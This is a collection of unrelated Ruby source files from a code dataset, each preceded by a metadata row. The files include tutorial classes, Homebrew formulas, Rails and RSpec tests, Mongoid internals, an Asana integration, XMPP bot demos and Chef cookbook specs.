| 21.4 | 65 | 0.724299 |
21d764fc177809a39ad3a254ab32bf251b510080 | 938 | class Person
def initialize(name, age)
@name = name
@age = age
end
def get_info
@additiona_info = "Interesting"
"Name: #{@name}, age #{@age}"
end
def name
@name
end
def name= (new_name)
@name = new_name
end
end
class PersonNew
attr_accessor :name, :age
end
person2 = PersonNew.new
p person2.name
p person2.age
person2.name = "Sally"
person2.age = 77
puts person2.name
puts person2.age
person1 = Person.new("Joanna", 34)
p person1.instance_variables
puts person1.get_info
p person1.instance_variables
person1.name = "Mike"
puts person1.name
# Person with a validating age writer: ages above 120 are rejected and the
# previous value (or the default of 5) is kept.
class PersonNewAgain
  attr_reader :age
  attr_accessor :name

  def initialize(name, ageVar)
    @name = name
    self.age = ageVar # go through the setter so validation applies
    puts age
  end

  # Custom writer: seeds @age with 5 on first use, then only accepts
  # values of 120 or less.
  def age=(new_age)
    @age ||= 5
    @age = new_age if new_age <= 120
  end
end
# 130 exceeds the cap in PersonNewAgain#age=, so age falls back to 5.
person3 = PersonNewAgain.new("Kim", 130)
puts "My age is #{person3.age}"
person3.age = 100
puts person3.age
| 17.054545 | 40 | 0.685501 |
33a8fd476e0ca0ae988f58d004a50328d243db63 | 274 | class OnyxLion < Cask
version '2.4.8'
sha256 'e637359020d3514cf1fe40d1f616692919c41aed926a395bbc7093b256e42e35'
url 'http://www.titanium.free.fr/download/107/OnyX.dmg'
homepage 'http://www.titanium.free.fr/downloadonyx.php'
license :unknown
app 'OnyX.app'
end
| 24.909091 | 75 | 0.766423 |
f7ffd9151a56f987575ab557cde3e0b1843d46f5 | 395 | # frozen_string_literal: true
module Ivapi
  class Client
    # API endpoint wrapper scoped to one hosting account.
    class Hosting < Base
      attr_reader :hosting_id

      def initialize(client, hosting_id)
        super(client)
        @hosting_id = hosting_id
      end

      # Fetches the hosting account details from the JSON endpoint.
      def information
        get('/json.php', command: 'hosting_info', id: hosting_id)
      end
      alias info information
    end
  end
end
| 18.809524 | 60 | 0.622785 |
335156032b78f29a252c85f5d89d940ab0ae0e67 | 642 | require 'test_helper'
# Integration tests asserting each static page responds 200 and renders the
# expected <title>.
class StaticPagesControllerTest <
  ActionDispatch::IntegrationTest

  test "should get home" do
    get root_path
    assert_response :success
    assert_select "title", "Ruby on Rails Tutorial Sample App"
  end

  test "should get help" do
    get help_path
    assert_response :success
    assert_select "title", "Help | Ruby on Rails Tutorial Sample App"
  end

  test "should get about" do
    get about_path
    assert_response :success
    assert_select "title", "About | Ruby on Rails Tutorial Sample App"
  end

  test "should get contact" do
    get contact_path
    assert_response :success
    assert_select "title", "Contact | Ruby on Rails Tutorial Sample App"
  end
end
ed38cc0f1c69d2f270f2f0fe8feb1172ad87d844 | 520 | # frozen_string_literal: true
# Claimant whose identity and payee data are backed by a BGS record.
class BgsRelatedClaimant < Claimant
  include AssociatedBgsRecord

  validate { |claimant| ClaimantValidator.new(claimant).validate }

  # Combines general claimant info with the person's name details,
  # both looked up by participant_id.
  def fetch_bgs_record
    bgs.fetch_claimant_info_by_participant_id(participant_id)
       .merge(bgs.fetch_person_info(participant_id))
  end

  # Payee code from the BGS record, or nil when no record is available.
  def bgs_payee_code
    bgs_record ? bgs_record[:payee_code] : nil
  end

  # Memoized BGS lookup (with retry handled by the shared helper).
  def bgs_record
    @bgs_record ||= try_and_retry_bgs_record
  end
end
| 20.8 | 76 | 0.780769 |
d5f4904a02e8e3d652b794dc7dbf9e0473e27c31 | 7,224 | # frozen_string_literal: true
# encoding: utf-8
module Mongoid
  module Association

    # This is the superclass for all many to one and many to many association
    # proxies.
    class Many < Association::Proxy
      include ::Enumerable

      # Aggregations run through the association's criteria; length/size read
      # straight from the in-memory target.
      delegate :avg, :max, :min, :sum, to: :criteria
      delegate :length, :size, to: :_target

      # Is the association empty?
      #
      # @example Is the association empty??
      #   person.addresses.blank?
      #
      # @return [ true, false ] If the association is empty or not.
      #
      # @since 2.1.0
      def blank?
        size == 0
      end

      # Creates a new document on the references many association. This will
      # save the document if the parent has been persisted.
      #
      # @example Create and save the new document.
      #   person.posts.create(:text => "Testing")
      #
      #
      # @param [ Hash ] attributes The attributes to create with.
      # @param [ Class ] type The optional type of document to create.
      #
      # @return [ Document ] The newly created document.
      #
      # @since 2.0.0.beta.1
      def create(attributes = nil, type = nil, &block)
        if attributes.is_a?(::Array)
          attributes.map { |attrs| create(attrs, type, &block) }
        else
          doc = build(attributes, type, &block)
          _base.persisted? ? doc.save : raise_unsaved(doc)
          doc
        end
      end

      # Creates a new document on the references many association. This will
      # save the document if the parent has been persisted and will raise an
      # error if validation fails.
      #
      # @example Create and save the new document.
      #   person.posts.create!(:text => "Testing")
      #
      # @param [ Hash ] attributes The attributes to create with.
      # @param [ Class ] type The optional type of document to create.
      #
      # @raise [ Errors::Validations ] If validation failed.
      #
      # @return [ Document ] The newly created document.
      #
      # @since 2.0.0.beta.1
      def create!(attributes = nil, type = nil, &block)
        if attributes.is_a?(::Array)
          attributes.map { |attrs| create!(attrs, type, &block) }
        else
          doc = build(attributes, type, &block)
          _base.persisted? ? doc.save! : raise_unsaved(doc)
          doc
        end
      end

      # Find the first document given the conditions, or creates a new document
      # with the conditions that were supplied.
      #
      # @example Find or create.
      #   person.posts.find_or_create_by(:title => "Testing")
      #
      # @param [ Hash ] attrs The attributes to search or create with.
      # @param [ Class ] type The optional type of document to create.
      #
      # @return [ Document ] An existing document or newly created one.
      def find_or_create_by(attrs = {}, type = nil, &block)
        find_or(:create, attrs, type, &block)
      end

      # Find the first document given the conditions, or creates a new document
      # with the conditions that were supplied. This will raise an error if validation fails.
      #
      # @example Find or create.
      #   person.posts.find_or_create_by!(:title => "Testing")
      #
      # @param [ Hash ] attrs The attributes to search or create with.
      # @param [ Class ] type The optional type of document to create.
      #
      # @raise [ Errors::Validations ] If validation failed.
      #
      # @return [ Document ] An existing document or newly created one.
      def find_or_create_by!(attrs = {}, type = nil, &block)
        find_or(:create!, attrs, type, &block)
      end

      # Find the first +Document+ given the conditions, or instantiates a new document
      # with the conditions that were supplied
      #
      # @example Find or initialize.
      #   person.posts.find_or_initialize_by(:title => "Test")
      #
      # @param [ Hash ] attrs The attributes to search or initialize with.
      # @param [ Class ] type The optional subclass to build.
      #
      # @return [ Document ] An existing document or newly instantiated one.
      def find_or_initialize_by(attrs = {}, type = nil, &block)
        find_or(:build, attrs, type, &block)
      end

      # This proxy can never be nil.
      #
      # @example Is the proxy nil?
      #   relation.nil?
      #
      # @return [ false ] Always false.
      #
      # @since 2.0.0
      def nil?
        false
      end

      # Since method_missing is overridden we should override this as well.
      #
      # @example Does the proxy respond to the method?
      #   relation.respond_to?(:name)
      #
      # @param [ Symbol ] name The method name.
      # @param [ true, false ] include_private Whether to include private methods.
      #
      # @return [ true, false ] If the proxy responds to the method.
      #
      # @since 2.0.0
      def respond_to?(name, include_private = false)
        [].respond_to?(name, include_private) ||
          klass.respond_to?(name, include_private) || super
      end

      # This is public access to the association's criteria.
      #
      # @example Get the scoped association.
      #   relation.scoped
      #
      # @return [ Criteria ] The scoped criteria.
      #
      # @since 2.1.0
      def scoped
        criteria
      end

      # Gets the document as a serializable hash, used by ActiveModel's JSON and
      # XML serializers. This override is just to be able to pass the :include
      # and :except options to get associations in the hash.
      #
      # @example Get the serializable hash.
      #   relation.serializable_hash
      #
      # @param [ Hash ] options The options to pass.
      #
      # @option options [ Symbol ] :include What associations to include
      # @option options [ Symbol ] :only Limit the fields to only these.
      # @option options [ Symbol ] :except Don't include these fields.
      #
      # @return [ Hash ] The documents, ready to be serialized.
      #
      # @since 2.0.0.rc.6
      def serializable_hash(options = {})
        _target.map { |document| document.serializable_hash(options) }
      end

      # Get a criteria for the embedded documents without the default scoping
      # applied.
      #
      # @example Get the unscoped criteria.
      #   person.addresses.unscoped
      #
      # @return [ Criteria ] The unscoped criteria.
      #
      # @since 2.4.0
      def unscoped
        criteria.unscoped
      end

      private

      # The session of the base document, used for persistence operations.
      def _session
        _base.send(:_session)
      end

      # Find the first object given the supplied attributes or create/initialize it.
      #
      # @example Find or create|initialize.
      #   person.addresses.find_or(:create, :street => "Bond")
      #
      # @param [ Symbol ] method The method name, create or new.
      # @param [ Hash ] attrs The attributes to search or build with.
      # @param [ Class ] type The optional subclass to build.
      #
      # @return [ Document ] A matching document or a new/created one.
      #
      # NOTE(review): this mutates the caller-supplied attrs hash when a type
      # is given (adds the "_type" key) — existing behavior, kept as-is.
      def find_or(method, attrs = {}, type = nil, &block)
        attrs["_type"] = type.to_s if type
        where(attrs).first || send(method, attrs, type, &block)
      end
    end
  end
end
ac833395e3277b25256f4a8a50f2ec3c181c5097 | 2,263 | # frozen_string_literal: true
require 'spec_helper'
require 'request_store'
# Integration spec: forks a real server process and exchanges messages with it
# through Redis, so timing (sleep) and cleanup (kill/flushdb) matter here.
RSpec.describe ServiceProtocol::Redis::Client do
  # NOTE(review): defining this module inside the spec leaks TestNamespace
  # into the global namespace for the whole suite.
  module TestNamespace
    # Test class
    class TestOperation
      class << self
        include ServiceProtocol::Redis::Connection

        # Either computes `one <operator> two`, or (when no operator is set)
        # simulates slow work and writes a key into Redis as a side effect.
        def call(params)
          if RequestStore[:operator]
            { equals: params[:one].send(RequestStore[:operator], params[:two]) }
          else
            sleep(0.25)
            redis.set params[:key], params[:value]
            {}
          end
        end
      end
    end
  end

  let(:queue_name) { 'api.service' }
  let(:operation) { "#{queue_name}:test_namespace/test_operation" }

  describe 'integration' do
    include ServiceProtocol::Redis::Connection

    let(:server) { ServiceProtocol::Redis::Server.new(queue_name) }
    let(:fork_server) do
      fork { server.run }
    end
    let(:default_meta) do
      { user_id: 1, tenant_id: 1 }
    end
    let(:meta) do
      default_meta
    end

    before do
      RequestStore.clear!
      redis.flushdb
      fork_server
    end

    after do
      # Give queued work time to drain before asserting Redis is empty.
      sleep(1)
      expect_clean_db
      Process.kill(9, fork_server)
    end

    describe '.call' do
      let(:params) do
        { one: 1, two: 2 }
      end
      let(:meta) do
        default_meta.merge(operator: '+')
      end
      let(:output) do
        described_class.call(operation, params, meta)
      end

      it 'waits for a response' do
        expect(output).to eq(equals: 3)
      end

      it 'server does not cache requests and responses' do
        params[:one] = 2
        expect(output).to eq(equals: 4)
      end
    end

    describe '.queue' do
      let(:params) do
        { key: 'x', value: 'y' }
      end
      let(:output) do
        described_class.queue(operation, params, meta)
      end

      # NOTE(review): description has typos ("process asyncronously");
      # renaming would change the reported example name.
      it 'process asyncronously' do
        expect(output).to eq({})
        expect(set_value).to eq(nil)
        sleep(1)
        expect(set_value).to eq(params[:value])
        redis.del params[:key]
      end

      private

      def set_value
        redis.get(params[:key])
      end
    end

    def expect_clean_db
      # expect(redis.lpop('api.service:processing')).to eq(nil)
      expect(redis.keys).to eq []
    end
  end
end
| 20.026549 | 80 | 0.576668 |
d5ad67b01cb4fca15cabf9ef5d164c4c03e3aa99 | 57 | module InheritedResources
  # Released gem version.
  VERSION = '1.5.1'.freeze
end
| 14.25 | 26 | 0.754386 |
abd6e5a3dc7e4993842c2f522cc2d509574f0b43 | 2,451 |
###
# This Ruby source file was generated by test-to-ruby.xsl
# and is a derived work from the source document.
# The source document contained the following notice:
=begin
Copyright (c) 2001 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
=end
#
require File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..', 'helper'))
###
# The createTFoot() method creates a table footer row or returns
# an existing one.
# Try to create a new TFOOT element on the second TABLE element.
# Since a TFOOT element already exists in the TABLE element a new
# TFOOT element is not created and information from the already
# existing TFOOT element is returned.
# @author NIST
# @author Rick Rivello
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-html#ID-8453710]
##
# Generated W3C DOM Level 1 conformance test: createTFoot() must return the
# existing TFOOT of the second table rather than creating a new one.
DOMTestCase('HTMLTableElement23') do

  ###
  # Constructor.
  # @param factory document factory, may not be null
  # @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
  ##
  def setup
    ##
    ## check if loaded documents are supported for content type
    ##
    contentType = getContentType()
    preload(contentType, "table", true)
  end

  ###
  # Runs the test case.
  # @throws Throwable Any uncaught exception causes test to fail
  #
  def test_HTMLTableElement23
    nodeList = nil
    testNode = nil
    vsection = nil
    newFoot = nil
    valign = nil
    doc = nil
    doc = load_document("table", true)
    nodeList = doc.getElementsByTagName("table")
    assertSize("Asize", 3, nodeList)
    testNode = nodeList.item(1)
    # createTFoot() is expected to return the pre-existing footer, so the
    # alignment read back below comes from the original markup.
    newFoot = testNode.createTFoot()
    vsection = testNode.tFoot()
    valign = vsection.align()
    assert_equal("center", valign, "alignLink")
  end

  ###
  # Gets URI that identifies the test.
  # @return uri identifier of test
  #
  def targetURI
    "http://www.w3.org/2001/DOM-Test-Suite/level1/html/HTMLTableElement23"
  end
end
| 29.178571 | 113 | 0.705426 |
d5ddce1482e5bbc851ab390ac32c656baed92a60 | 422 | require 'formula'
# Homebrew formula for blitzwave, a wavelet library built on Blitz++.
class Blitzwave < Formula
  homepage 'http://oschulz.github.io/blitzwave'
  url 'https://github.com/downloads/oschulz/blitzwave/blitzwave-0.7.1.tar.gz'
  sha1 '2a53f1a9b7967897415afce256f02693a35f380e'

  depends_on 'blitz'

  # Standard autotools build into the Cellar prefix.
  def install
    args = %W[--disable-debug --disable-dependency-tracking --prefix=#{prefix}]
    system "./configure", *args
    system "make", "install"
  end
end
| 26.375 | 77 | 0.677725 |
ab2ccfd304355f9c5ce5318e42cf1b217d039148 | 121 | class AddUserIdToOrders < ActiveRecord::Migration[5.0]
def change
  # Adds an integer orders.user_id column so each order can reference a user.
  add_column :orders, :user_id, :integer
end
end
| 20.166667 | 54 | 0.743802 |
3998d3719961dfa9509b2f8442bafce756499966 | 2,739 | require 'asana'
# Project service that mirrors pushed commit messages into referenced Asana
# tasks, optionally completing tasks mentioned with fix/close keywords.
class AsanaService < Service
  prop_accessor :api_key, :restrict_to_branch
  validates :api_key, presence: true, if: :activated?

  def title
    'Asana'
  end

  def description
    'Asana - Teamwork without email'
  end

  def help
    'This service adds commit messages as comments to Asana tasks.
Once enabled, commit messages are checked for Asana task URLs
(for example, `https://app.asana.com/0/123456/987654`) or task IDs
starting with # (for example, `#987654`). Every task ID found will
get the commit comment added to it.
You can also close a task with a message containing: `fix #123456`.
You can create a Personal Access Token here:
http://app.asana.com/-/account_api'
  end

  def self.to_param
    'asana'
  end

  # Admin-UI form field definitions for this service's settings.
  def fields
    [
      {
        type: 'text',
        name: 'api_key',
        placeholder: 'User Personal Access Token. User must have access to task, all comments will be attributed to this user.',
        required: true
      },
      {
        type: 'text',
        name: 'restrict_to_branch',
        placeholder: 'Comma-separated list of branches which will be automatically inspected. Leave blank to include all branches.'
      }
    ]
  end

  def self.supported_events
    %w(push)
  end

  # Memoized Asana API client authenticated with the configured token.
  def client
    @_client ||= begin
      Asana::Client.new do |c|
        c.authentication :access_token, api_key
      end
    end
  end

  # Entry point for push events: filters by branch, then comments on every
  # task referenced by each pushed commit.
  def execute(data)
    return unless supported_events.include?(data[:object_kind])

    # check the branch restriction is populated and branch is not included
    branch = Gitlab::Git.ref_name(data[:ref])
    branch_restriction = restrict_to_branch.to_s
    if branch_restriction.length > 0 && branch_restriction.index(branch).nil?
      return
    end

    user = data[:user_name]
    project_name = project.full_name

    data[:commits].each do |commit|
      push_msg = "#{user} 推送分支 #{branch} of #{project_name} ( #{commit[:url]} ):"
      check_commit(commit[:message], push_msg)
    end
  end

  def check_commit(message, push_msg)
    # matches either:
    # - #1234
    # - https://app.asana.com/0/0/1234
    # optionally preceded with:
    # - fix/ed/es/ing
    # - close/s/d
    # - closing
    issue_finder = %r{(fix\w*|clos[ei]\w*+)?\W*(?:https://app\.asana\.com/\d+/\d+/(\d+)|#(\d+))}i

    message.scan(issue_finder).each do |tuple|
      # tuple will be
      # [ 'fix', 'id_from_url', 'id_from_pound' ]
      taskid = tuple[2] || tuple[1]

      begin
        task = Asana::Task.find_by_id(client, taskid)
        task.add_comment(text: "#{push_msg} #{message}")

        # A fix/close keyword before the reference marks the task complete.
        if tuple[0]
          task.update(completed: true)
        end
      rescue => e
        # A bad task id must not abort the remaining references.
        Rails.logger.error(e.message)
        next
      end
    end
  end
end
| 25.361111 | 131 | 0.636729 |
085d528e5b0ccb7f842d9e4f6a53cc94d4101c95 | 384 | if ENV['MY_RUBY_HOME'] && ENV['MY_RUBY_HOME'].include?('rvm')
begin
require 'rvm'
RVM.use_from_path! File.dirname(File.dirname(__FILE__))
rescue LoadError
raise "RVM gem is currently unavailable."
end
end
# If you're not using Bundler at all, remove lines bellow
ENV['BUNDLE_GEMFILE'] = File.expand_path('../Gemfile', File.dirname(__FILE__))
require 'bundler/setup' | 32 | 78 | 0.723958 |
4a3fe84d7f73dc82917855d5ffa9b9c5b4841949 | 954 | require 'spec_helper'
# Verifies the worker only triggers RunScheduledBuildService for builds that
# exist and are in the :scheduled state.
describe Ci::BuildScheduleWorker do
  subject { described_class.new.perform(build.id) }

  context 'when build is found' do
    context 'when build is scheduled' do
      let(:build) { create(:ci_build, :scheduled) }

      it 'executes RunScheduledBuildService' do
        expect_any_instance_of(Ci::RunScheduledBuildService)
          .to receive(:execute).once

        subject
      end
    end

    context 'when build is not scheduled' do
      let(:build) { create(:ci_build, :created) }

      # NOTE(review): description says "executes" but the expectation is the
      # negative; the example name is misleading.
      it 'executes RunScheduledBuildService' do
        expect_any_instance_of(Ci::RunScheduledBuildService)
          .not_to receive(:execute)

        subject
      end
    end
  end

  context 'when build is not found' do
    # build_stubbed is never persisted, so perform(id) finds nothing.
    let(:build) { build_stubbed(:ci_build, :scheduled) }

    it 'does nothing' do
      expect_any_instance_of(Ci::RunScheduledBuildService)
        .not_to receive(:execute)

      subject
    end
  end
end
| 23.268293 | 60 | 0.666667 |
01bb6933a5c9d5a0c6b65e9e71b9eccc4553defd | 642 | # frozen_string_literal: true
# Feature spec for the node creation form (happy path and validation error).
describe 'Node new page', type: :feature do
  let(:current_user) { create :user }

  before do
    # The form requires a default zone and an 'Active' status to exist.
    create :zone, default: true
    create :status, name: 'Active'
    login_as current_user
    visit new_node_path
  end

  it { expect(page).to have_content 'New Node' }

  it 'allows a node to be created' do
    fill_in 'node_name', with: 'Spec Node'
    select 'Active', from: 'node_status_id'
    click_button 'Create'
    expect(page).to have_content 'Spec Node'
  end

  it 'shows an error if node creation fails' do
    # Submitting with a blank name triggers the presence validation.
    click_button 'Create'
    expect(page).to have_content "Name can't be blank"
  end
end
| 23.777778 | 54 | 0.688474 |
91679c9dc2ccf63cb40829e2635672a5ff0bcbfa | 781 | require 'test_helper'
# Verifies GeoCerts.host switches between sandbox/production and honors an
# explicitly configured host (the `setting` helper restores state afterwards).
class GeoCertsTest < Test::Unit::TestCase

  context 'GeoCerts' do

    should 'use the sandbox host' do
      setting(GeoCerts, :sandbox, :to => true) do
        assert_equal('https://sandbox.geocerts.com', GeoCerts.host)
      end
    end

    should 'use the production host' do
      setting(GeoCerts, :sandbox, :to => false) do
        assert_equal('https://www.geocerts.com', GeoCerts.host)
      end
    end

    should 'use the given host' do
      setting(GeoCerts, :host, :to => 'test.com', :back => nil) do
        assert_equal('test.com', GeoCerts.host)
      end

      # A host with an explicit port must be passed through untouched.
      setting(GeoCerts, :host, :to => 'test.com:8000', :back => nil) do
        assert_equal('test.com:8000', GeoCerts.host)
      end
    end

  end

end
| 24.40625 | 71 | 0.596671 |
ff0a679380b1fd11463627c64c7a68cbde9135d3 | 1,192 | # frozen_string_literal: true
require './test_helper'
# Minitest suite for the Pokedex gem; HTTP traffic is replayed via VCR
# cassettes so no live API calls are made.
class PokedexTest < Minitest::Test
  def test_that_it_has_a_version_number
    refute_nil ::Pokedex::VERSION
  end

  # NOTE(review): method name has a typo ("fin" for "find"); renaming would
  # change the reported test name.
  def test_fin_pokemon_with_filter
    VCR.use_cassette('Find_pokemon') do
      pokemon = Pokedex.Find_pokemon('p', 300)
      assert_instance_of Array, pokemon
    end
  end

  def test_find_pokemon_with_filter_equal
    VCR.use_cassette('Find_pokemon') do
      pokemon = Pokedex.Find_pokemon('z')
      assert_equal ["zubat"], pokemon
    end
  end

  def test_get_ability
    VCR.use_cassette('Ability_Skills') do
      pokemon = Pokedex.Ability_Skills(5)
      assert_instance_of Hash, pokemon
    end
  end

  def test_get_type
    VCR.use_cassette('Type_Skills') do
      pokemon = Pokedex.Type_Skills(5)
      assert_instance_of Hash, pokemon
    end
  end

  def test_get_pokemon
    VCR.use_cassette('Pokemon') do
      pokemon = Pokedex.Pokemon('pikachu')
      assert_instance_of Hash, pokemon
    end
  end

  def test_get_pokemon_with_filter
    VCR.use_cassette('Pokemon_filter') do
      pokemon = Pokedex.Pokemon_filter('pikachu', 'moves')
      assert_instance_of Array, pokemon
    end
  end
end
| 22.074074 | 58 | 0.713087 |
1dba133343acbd0800de3d3ff85369dabc692cf7 | 678 | cask "pingplotter" do
version "5.23.2"
sha256 :no_check
url "https://www.pingplotter.com/downloads/pingplotter_osx.zip"
name "PingPlotter"
desc "Network monitoring tool"
homepage "https://www.pingplotter.com/"
livecheck do
url "https://www.pingplotter.com/download/release-notes"
regex(/<h3>v?(\d+(?:\.\d+)+)[[:space:]<]/i)
end
app "PingPlotter.app"
uninstall quit: "com.pingman.pingplotter.mac"
zap trash: [
"~/Library/Application Support/PingPlotter",
"~/Library/Logs/PingPlotter",
"~/Library/Preferences/com.pingman.pingplotter.mac.plist",
"~/Library/Saved Application State/com.pingman.pingplotter.mac.savedState",
]
end
| 26.076923 | 79 | 0.69469 |
ede4bb1069f856c37195d465d449ee360c107704 | 1,510 | class Guide
include Mongoid::Document
include Mongoid::Paperclip
include Mongoid::Slug
searchkick
is_impressionable counter_cache: true,
column_name: :impressions_field,
unique: :session_hash
field :impressions_field, default: 0
belongs_to :crop, counter_cache: true
belongs_to :user
has_many :stages
has_many :requirements
field :name
field :location
field :overview
field :practices, type: Array
validates_presence_of :user, :crop, :name
has_mongoid_attached_file :featured_image,
default_url: '/assets/leaf-grey.png'
validates_attachment_size :featured_image, in: 1.byte..2.megabytes
validates_attachment :featured_image,
content_type: { content_type:
['image/jpg', 'image/jpeg', 'image/png', 'image/gif'] }
handle_asynchronously :featured_image=
# True only when a user is signed in and is this guide's author.
def owned_by?(current_user)
  return false unless current_user
  !!(user == current_user)
end
# Fields serialized into the Searchkick index.
def search_data
  as_json only: [:name, :overview, :crop_id]
end
# Not implemented yet — always nil. The commented code sketches a
# deterministic pseudo-random score seeded by the crop name.
def compatibility_score
  # Make our random scores consistent based on the first character of the crop name
  # srand(name[0].ord)
  # rand(100);
  nil
end
# Placeholder until compatibility_score is implemented; always returns ''.
def compatibility_label
  ''
  # TODO:
  # score = compatibility_score
  # if score.nil?
  #   return ''
  # elsif score > 75
  #   return 'high'
  # elsif score > 50
  #   return 'medium'
  # else
  #   return 'low'
  # end
end

# URL slug derived from the guide name (Mongoid::Slug).
slug :name
end
| 22.878788 | 85 | 0.641722 |
bfb2e321afc74035e7cd8bf8cd1a4a827d18d0fc | 664 | require 'rubygems'
require 'blather/client/dsl'
$stdout.sync = true
# "Ping" half of the demo: replies to every "pong" chat message with "ping",
# and serves the first message when the pong account comes online.
module Ping
  extend Blather::DSL
  def self.run; client.run; end

  setup '[email protected]', 'password'

  status :from => /pong@your\.jabber\.server/ do |s|
    puts "serve!"
    say s.from, 'ping'
  end

  message :chat?, :body => 'pong' do |m|
    puts "ping!"
    say m.from, 'ping'
  end
end
# "Pong" half of the demo: replies to every "ping" chat message with "pong".
module Pong
  extend Blather::DSL
  def self.run; client.run; end

  setup '[email protected]', 'password'

  message :chat?, :body => 'ping' do |m|
    puts "pong!"
    say m.from, 'pong'
  end
end
# Stop the EventMachine reactor cleanly on Ctrl-C or TERM.
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }

# Run both bots inside a single EventMachine reactor.
EM.run do
  Ping.run
  Pong.run
end
| 17.025641 | 52 | 0.629518 |
4a257b11159dfdd4e6032513339ce41bb3498652 | 471 | # frozen_string_literal: true
require "zombie_check/core_ext/ennumerable"
require "zombie_check/core_ext/string"
require "zombie_check/version"
require "zombie_check/ping"
require "zombie_check/ping/checker"
require "zombie_check/ping/checker_report"
require "zombie_check/ping/host_stat"
require "zombie_check/ping/ping_sender"
require "zombie_check/ping/ping_sender/net_ping"
require "zombie_check/ping/ping_sender/unix_ping"
require "net/ping"
# Root namespace for the gem; all behavior lives in the files required above.
module ZombieCheck
end
| 29.4375 | 49 | 0.842887 |
3878e4f182511a08b96a37b8bb8260efb7152dc2 | 873 | # encoding: utf-8
require 'spec_helper'
describe NexaasID::Configuration do
  subject do
    described_class.build do |c|
      c.url = 'http://some/where'
      c.user_agent = 'My App v1.0'
      c.application_token = 'some-app-token'
      c.application_secret = 'some-app-secret'
    end
  end

  # NOTE(review): description mentions "production ... by default" but the
  # assertion checks the explicitly configured url above; the example name
  # is misleading.
  it "should use the production Nexaas ID URL by default" do
    expect(subject.url).to eq('http://some/where')
  end

  it "should use a default user agent" do
    expect(subject.user_agent).to eq('My App v1.0')
  end

  it 'generates an URL to a resource' do
    configuration = subject
    expect(configuration.url_for('/api/v1/profile')).
      to eq('http://some/where/api/v1/profile')

    # url_for must pick up a changed base URL.
    configuration.url = 'https://sandbox.id.nexaas.com/'
    expect(configuration.url_for('/api/v1/profile'))
      .to eq('https://sandbox.id.nexaas.com/api/v1/profile')
  end
end
| 26.454545 | 60 | 0.670103 |
288564687847ccf4f1da7cf773642dd8aa645471 | 2,697 | #
# Cookbook:: veeam
# Spec:: standalone_complete
#
# maintainer:: Exosphere Data, LLC
# maintainer_email:: [email protected]
#
# Copyright:: 2020, Exosphere Data, LLC, All Rights Reserved.
require 'spec_helper'
# ChefSpec coverage: the recipe must converge on supported Windows versions
# and raise a clear error everywhere else.
describe 'veeam::standalone_complete' do
  before do
    mock_windows_system_framework # Windows Framework Helper from 'spec/windows_helper.rb'
    stub_command('sc.exe query W3SVC').and_return 1
    stub_data_bag_item('veeam', 'license').and_return(nil)
  end

  context 'Run recipe' do
    platforms = {
      'windows' => {
        'versions' => %w(2012 2012R2 2016)
      }
    }
    platforms.each do |platform, components|
      components['versions'].each do |version|
        context "On #{platform} #{version}" do
          before do
            Fauxhai.mock(platform: platform, version: version)
            node.override['veeam']['build'] = '9.5.0.1536'
          end
          let(:runner) do
            ChefSpec::SoloRunner.new(platform: platform, version: version, file_cache_path: '/tmp/cache')
          end
          let(:node) { runner.node }
          let(:chef_run) { runner.converge(described_recipe) }
          it 'converges successfully' do
            expect { chef_run }.not_to raise_error
            # Every component resource in the standalone stack must be used.
            expect(chef_run).to install_veeam_prerequisites('Install Veeam Prerequisites')
            expect(chef_run).to install_veeam_catalog('Install Veeam Backup Catalog')
            expect(chef_run).to install_veeam_console('Install Veeam Backup Console')
            expect(chef_run).to install_veeam_server('Install Veeam Backup Server')
            expect(chef_run).to install_veeam_explorer('Install Veeam Backup Explorers')
            expect(chef_run).to install_veeam_upgrade('9.5.0.1536').with(package_url: node['veeam']['installer']['update_url'])
          end
        end
      end
    end
  end
  context 'Does not install' do
    platforms = {
      'windows' => {
        'versions' => %w(2008R2) # Unable to test plain Win2008 since Fauxhai doesn't have a template for 2008
      },
      'ubuntu' => {
        'versions' => %w(16.04)
      }
    }
    platforms.each do |platform, components|
      components['versions'].each do |version|
        context "On #{platform} #{version}" do
          before do
            Fauxhai.mock(platform: platform, version: version)
          end
          let(:chef_run) do
            ChefSpec::SoloRunner.new(platform: platform, version: version).converge(described_recipe)
          end
          it 'raises an exception' do
            expect { chef_run }.to raise_error(ArgumentError, 'This recipe requires a Windows 2012 or higher host!')
          end
        end
      end
    end
  end
end
| 35.025974 | 127 | 0.630701 |
3944e965fe49427c08951291e4acea85337ad5ce | 376 | require "bundler/setup"
require "notable/covid/deaths"
RSpec.configure do |config|
  # Enable flags like --only-failures and --next-failure
  config.example_status_persistence_file_path = ".rspec_status"

  # Disable RSpec exposing methods globally on `Module` and `main`
  config.disable_monkey_patching!

  config.expect_with :rspec do |c|
    c.syntax = :expect
  end
end
e8818a62ae00e872db04e3cc8312aaeaf6b158cb | 798 | #
# Cookbook Name:: splunk
# Recipe:: install_forwarder
#
# Author: Joshua Timberman <[email protected]>
# Copyright (c) 2014, Chef Software, Inc <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Install the Splunk Universal Forwarder package from the configured URL.
splunk_installer 'splunkforwarder' do
  url node['splunk']['forwarder']['url']
end
| 33.25 | 74 | 0.750627 |
288069cb6061d2318b5ba56eb715c8197e567210 | 93,049 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
